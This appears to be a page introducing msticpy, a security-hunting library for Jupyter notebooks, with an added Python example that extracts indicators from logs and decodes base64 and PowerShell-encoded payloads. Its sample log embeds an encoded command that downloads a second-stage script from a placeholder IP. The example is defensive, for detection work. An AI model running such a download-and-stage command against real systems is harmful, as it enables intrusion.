msticpy is a library for InfoSec investigation and hunting in Jupyter Notebooks. Functionality includes:
- querying log data from multiple sources (Azure Sentinel, MS Defender, Splunk, Local CSVs)
- enriching the data with Threat Intelligence, geo-locations and Azure resource data
- extracting Indicators of Activity (IoA) (IPs, URLs, etc.) from logs and unpacking encoded data
- performing sophisticated analysis such as anomalous session detection and time series decomposition
- visualizing data using interactive timelines, process trees and multi-dimensional Morph Charts
It also includes time-saving notebook tools such as widgets (set query times, item selection, view complex data formats) and several GUI tools that help you navigate the interface and configure the notebook environment.
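To make the "extract indicators from logs and unpack encoded data" item concrete, here is an added, self-contained example written for this page; it is not msticpy's code and does not call its API (msticpy's own extractor handles more indicator types, defanged forms and DataFrame input). It uses only the standard library, the log lines are constructed for the example, and the IP address and hash values are placeholders. It shows the two steps that matter for triage: finding base64 runs in a line (including the UTF-16LE form PowerShell uses for encoded commands), decoding them, and then running the indicator patterns over both the raw line and whatever was hidden inside it.

```python
"""Extract IoCs from log text and unpack base64 payloads found in it.

Added illustration of the capability listed above; not msticpy code.
Only the standard library is used.
"""
import base64
import binascii
import re
from collections import defaultdict

# Simplified indicator patterns (a production extractor covers many more types).
IOC_PATTERNS = {
    "ipv4": re.compile(
        r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
    ),
    "url": re.compile(r"""\bhttps?://[^\s"'<>]+""", re.IGNORECASE),
    "sha256": re.compile(r"\b[0-9a-fA-F]{64}\b"),
    "md5": re.compile(r"\b[0-9a-fA-F]{32}\b"),
}

# Candidate base64 runs: long enough to be a payload rather than a short token,
# and not glued to other base64-alphabet characters.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{24,}={0,2}(?![A-Za-z0-9+/=])")
HEX_RE = re.compile(r"[0-9a-fA-F]+")


def try_b64_decode(token: str):
    """Return decoded text if token is valid base64 yielding printable text, else None."""
    if HEX_RE.fullmatch(token):
        # A pure-hex run is almost certainly a hash; it is also valid base64 and
        # may decode to "printable" UTF-16 garbage, so skip it explicitly.
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    # PowerShell -EncodedCommand payloads are UTF-16LE, so try that after UTF-8.
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text
    return None


def unpack_encoded(text: str, max_depth: int = 3):
    """Recursively decode base64 runs in text; returns decoded strings, outermost first."""
    decoded = []
    frontier = [text]
    for _ in range(max_depth):  # bound recursion on nested encodings
        next_frontier = []
        for chunk in frontier:
            for m in B64_RE.finditer(chunk):
                inner = try_b64_decode(m.group(0))
                if inner is not None:
                    decoded.append(inner)
                    next_frontier.append(inner)
        if not next_frontier:
            break
        frontier = next_frontier
    return decoded


def extract_iocs(lines):
    """Return ({ioc_type: set(values)}, [decoded payloads]) for raw and unpacked text."""
    iocs = defaultdict(set)
    payloads = []
    for line in lines:
        texts = [line] + unpack_encoded(line)
        payloads.extend(texts[1:])
        for text in texts:
            for ioc_type, pattern in IOC_PATTERNS.items():
                for m in pattern.finditer(text):
                    iocs[ioc_type].add(m.group(0))
    return dict(iocs), payloads


# Constructed sample log lines (placeholder IP 203.0.113.7, placeholder hash).
_ENCODED_CMD = base64.b64encode(
    "Invoke-WebRequest http://203.0.113.7/stage2.ps1".encode("utf-16-le")
).decode()
SAMPLE_LOG = [
    '2021-05-10T12:00:01Z host=ws01 proc=powershell.exe cmd="powershell -enc ' + _ENCODED_CMD + '"',
    "2021-05-10T12:00:02Z host=ws01 net_conn dst=203.0.113.7:443 proto=tcp",
    "2021-05-10T12:00:03Z host=ws01 file_create sha256=" + "a" * 64 + " path=C:\\Users\\Public\\stage2.ps1",
]

if __name__ == "__main__":
    found, decoded = extract_iocs(SAMPLE_LOG)
    for ioc_type, values in sorted(found.items()):
        print(ioc_type, sorted(values))
    print("decoded payloads:", decoded)
```

The point of running the patterns over the decoded text as well as the raw line is that the URL and the IP in the first line only become visible after unpacking; matching on the raw line alone would link the network connection in the second line to the host but miss the staging URL. The hex-run guard in `try_b64_decode` matters in practice: a 64-character hash is syntactically valid base64 and can decode to "printable" UTF-16, so without the guard hashes turn into bogus payloads.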
MSTICPy goes 1.0!
Join us at PyCon Online 2021 (14-15 May 2021)
Deep-dive on The Launch Space (20 May 2021)
Check out our one-hour live broadcast on Microsoft Learn TV on May 20 at 1PM PT, where we'll dive deep into MSTICPy and its many uses! More details and save-the-date at https://aka.ms/thelaunchspacemsticpy. See you then!
I'd love to hear any feedback or questions, or to help out if you are trying any of these projects or examples.
You can reach me on Twitter (@as_w) or Aaron W#0101 on the Microsoft Open Source Discord (aka.ms/open-source-discord).